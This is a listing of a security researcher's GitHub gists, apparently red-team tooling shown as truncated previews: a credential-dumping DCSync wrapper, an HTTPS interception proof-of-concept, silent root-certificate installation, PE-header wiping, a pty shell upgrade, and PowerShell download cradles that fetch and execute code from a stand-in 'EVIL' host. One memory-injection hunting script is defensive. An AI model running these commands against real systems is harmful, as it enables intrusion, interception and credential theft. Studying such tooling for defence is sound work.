ahhh’s gists

ahhh / go-objdump.sh

Last active July 10, 2018 19:02

colorized go-objdump

	#!/bin/bash
	# go-objdump colorizes and reformats output of `go tool objdump`
	# - it inserts an empty line after unconditional control-flow modifying instructions (JMP, RET, UD2)
	# - it colors calls/returns in green
	# - it colors traps (UD2) in red
	# - it colors jumps (both conditional and unconditional) in blue
	# - it colors padding/nops in violet
	# - it colors the function name in yellow
	# - it unindent the function body

ahhh / upgrade to tty

Created June 22, 2018 16:45

upgrade to tty

python -c 'import pty; pty.spawn("/bin/bash")'

ahhh / gist:efc2814fadba4d684c73ba6f09852df6

Created April 28, 2018 09:57

WMIKatz - Are you afraid

This file has been truncated, but you can view the full file.

	<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
	<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->

	<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
	<xsl:strip-space elements="*" />

	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[

ahhh / Invoke-DCSync.ps1

Created March 20, 2018 22:05 — forked from HarmJ0y/Invoke-DCSync.ps1

What more could you want?

This file has been truncated, but you can view the full file.

	function Invoke-DCSync
	{
	<#
	.SYNOPSIS

	Uses dcsync from mimikatz to collect NTLM hashes from the domain.

	Author: @monoxgas

	Invoke-ReflectivePEInjection

ahhh / Get-InjectedThread.ps1

Created February 9, 2018 17:37 — forked from jaredcatkinson/Get-InjectedThread.ps1

Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone

	function Get-InjectedThread
	{
	<#

	.SYNOPSIS

	Looks for threads that were created as a result of code injection.

	.DESCRIPTION

ahhh / InterceptorThing.ps1

Created January 31, 2018 05:16

Interceptor - Normal User No Admin Required.

	<#
	.SYNOPSIS

	This script demonstrates the ability to capture and tamper with Web sessions.
	For secure sessions, this is done by dynamically writing certificates to match the requested domain.
	This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.

	Function: Interceptor
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause

ahhh / WipePEHeader.cpp

Created January 29, 2018 10:16 — forked from jackson5sec/WipePEHeader.cpp

	#include "stdafx.h"
	#include <Windows.h>
	#include <iostream>

	void WipePEHeader(HANDLE GetModuleBase)
	{
	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)GetModuleBase;
	PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + (DWORD)pDosHeader->e_lfanew);

	printf("NT Header at : %p\n", pNTHeader);

ahhh / script.ps1

Created January 24, 2018 06:59

Hooking MessageBox For No-Prompt Trusted Root Certificate Install


	#Verify Not Present
	( Get-ChildItem Cert:\CurrentUser\Root \| Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
	#Import-Certificate
	( Get-ChildItem -Path C:\Test\thing.cer ) \| Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
	#Prompted
	Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99

ahhh / DownloadCradles.ps1

Last active January 18, 2018 02:53 — forked from HarmJ0y/DownloadCradles.ps1

Download Cradles

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

ahhh / simple_bind.sh

Created January 2, 2018 23:11

simple bind shell as a shell script

Dan Borges ahhh